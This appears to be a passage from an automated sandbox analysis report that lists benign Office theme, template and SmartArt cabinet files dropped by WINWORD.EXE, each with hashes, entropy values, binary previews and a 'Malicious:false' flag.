                              Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):278
                              Entropy (8bit):3.544065206514744
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                              MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                              SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                              SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                              SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):3078052
                              Entropy (8bit):7.954129852655753
                              Encrypted:false
                              SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                              MD5:CDF98D6B111CF35576343B962EA5EEC6
                              SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                              SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                              SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                              Malicious:false
                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):274
                              Entropy (8bit):3.5303110391598502
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                              MD5:8D1E1991838307E4C2197ECB5BA9FA79
                              SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                              SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                              SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):2924237
                              Entropy (8bit):7.970803022812704
                              Encrypted:false
                              SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                              MD5:5AF1581E9E055B6E323129E4B07B1A45
                              SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                              SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                              SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                              Malicious:false
                              Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):286
                              Entropy (8bit):3.5434534344080606
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                              MD5:C9812793A4E94320C49C7CA054EE6AA4
                              SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                              SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                              SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):3611324
                              Entropy (8bit):7.965784120725206
                              Encrypted:false
                              SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                              MD5:FB88BFB743EEA98506536FC44B053BD0
                              SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                              SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                              SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                              Malicious:false
                              Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):288
                              Entropy (8bit):3.5359188337181853
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                              MD5:0FEA64606C519B78B7A52639FEA11492
                              SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                              SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                              SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):274
                              Entropy (8bit):3.4699940532942914
                              Encrypted:false
                              SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                              MD5:55BA5B2974A072B131249FD9FD42EB91
                              SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                              SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                              SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                              Malicious:false
                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):3465076
                              Entropy (8bit):7.898517227646252
                              Encrypted:false
                              SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                              MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                              SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                              SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                              SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                              Malicious:false
                              Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):276650
                              Entropy (8bit):7.995561338730199
                              Encrypted:true
                              SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                              MD5:84D8F3848E7424CBE3801F9570E05018
                              SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                              SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                              SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                              Malicious:false
                              Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                              Category:dropped
                              Size (bytes):295527
                              Entropy (8bit):7.996203550147553
                              Encrypted:true
                              SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                              MD5:9A07035EF802BF89F6ED254D0DB02AB0
                              SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                              SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                              SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                              Malicious:false
                              Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):20235
                              Entropy (8bit):7.61176626859621
                              Encrypted:false
                              SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                              MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                              SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                              SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                              SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                              Malicious:false
                              Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):25314
                              Entropy (8bit):7.729848360340861
                              Encrypted:false
                              SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                              MD5:C47E3430AF813DF8B02E1CB4829DD94B
                              SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                              SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                              SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                              Malicious:false
                              Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):22008
                              Entropy (8bit):7.662386258803613
                              Encrypted:false
                              SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                              MD5:ABBF10CEE9480E41D81277E9538F98CB
                              SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                              SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                              SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                              Malicious:false
                              Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                              Category:dropped
                              Size (bytes):31083
                              Entropy (8bit):7.814202819173796
                              Encrypted:false
                              SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                              MD5:89A9818E6658D73A73B642522FF8701F
                              SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                              SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                              SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                              Malicious:false
                              Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                              Category:dropped
                              Size (bytes):31482
                              Entropy (8bit):7.808057272318224
                              Encrypted:false
                              SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                              MD5:F10DF902980F1D5BEEA96B2C668408A7
                              SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                              SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                              SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                              Malicious:false
